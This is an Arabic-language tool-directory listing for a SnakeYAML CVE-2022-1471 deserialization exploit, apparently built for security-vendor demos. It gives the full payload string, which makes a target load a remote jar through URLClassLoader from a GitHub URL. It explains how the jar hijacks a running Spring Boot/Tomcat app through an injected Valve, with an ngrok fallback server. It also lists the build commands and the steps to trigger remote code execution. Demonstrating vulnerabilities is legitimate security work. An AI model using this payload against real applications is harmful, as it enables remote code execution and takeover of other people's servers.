Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
yaml-payload-2 — SnakeYAML CVE-2022-1471 استغلال حمولة لعروض Seal Security التوضيحية | Kitploit
أدوات/GitHubGitHub/seal-sec-demo-2/yaml-payload-2
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالفريق الأحمرتطوير الحمولات
GitHubseal-sec-demo-2/yaml-payload-2

yaml-payload-2

SnakeYAML CVE-2022-1471 استغلال حمولة لعروض Seal Security التوضيحية

عرض المستودع
5منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

yaml-payload

حمولة استغلال إلغاء تسلسل SnakeYAML لثغرة CVE-2022-1471، مقتبسة من artsploit/yaml-payload (مبنية أصلاً على mbechler/marshalsec).

ماذا تفعل

عند تحميلها عبر Yaml.load() غير الآمن في SnakeYAML، تقوم هذه الحمولة بالسيطرة على التطبيق قيد التشغيل واستبداله بصفحة "You've Been PWNED":

  1. تحقن صمام Tomcat Valve في تطبيق Spring Boot قيد التشغيل عبر الانعكاس (reflection)، مختطفة المنفذ الحالي 8080 — نفس الرابط (بما في ذلك أي نفق ngrok) يخدم الآن صفحة PWNED
  2. تعيد توجيه المتصفح تلقائياً — استجابة POST ترسل إعادة توجيه 302، فيقوم المتصفح فوراً بتحميل صفحة PWNED دون تحديث يدوي
  3. تفتح المتصفح تلقائياً على الرابط الصحيح (رابط ngrok العام إذا كان متاحاً، وإلا localhost:8080)
  4. تطبع دليل الاستغلال في سجلات وحدة التحكم/CI

إذا لم يكن حقن Tomcat Valve متاحاً (مثل تطبيق غير Spring)، فإنها تتراجع إلى تشغيل خادم HTTP مستقل على المنفذ 9999 وتنشئ تلقائياً نفق ngrok إذا كان ngrok قيد التشغيل.

يعمل هذا محلياً على macOS وفي خطوط أنابيب CI/CD (مثل GitHub Actions على Ubuntu).

كيف تعمل سلسلة الاستغلال

تقوم حمولة SnakeYAML بتشغيل ScriptEngineManager عبر واجهة مزود الخدمة Java SPI:

root@kitploit:~
!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["https://raw.githubusercontent.com/seal-sean-org/yaml-payload/main/yaml-payload.jar"]]]]
  1. يقوم SnakeYAML بإنشاء java.net.URL يشير إلى yaml-payload.jar في هذا المستودع
  2. يغلّفه في URLClassLoader لتحميل الفئات عن بُعد
  3. يكتشف ScriptEngineManager ويحمّل AwesomeScriptEngineFactory عبر META-INF/services/javax.script.ScriptEngineFactory
  4. يقوم مُنشئ المصنع بحقن Valve في خط أنابيب Tomcat قيد التشغيل، مستبدلاً كل استجابة لاحقة على / بصفحة PWNED

البناء

يتطلب JDK 17+:

root@kitploit:~
javac -d build src/artsploit/AwesomeScriptEngineFactory.java
cp -r src/META-INF build/
cd build && jar -cfv ../yaml-payload.jar . && cd ..

الاستخدام

تُستخدم كحمولة استغلال في مشروع maven-demo. الصق سلسلة الحمولة في حقل اسم التطبيق لتفعيل RCE. سيتم استبدال صفحة التطبيق بصفحة PWNED في الطلب التالي. راجع ملف README في ذلك المستودع للحصول على تعليمات العرض الكاملة.

تنزيل الأداة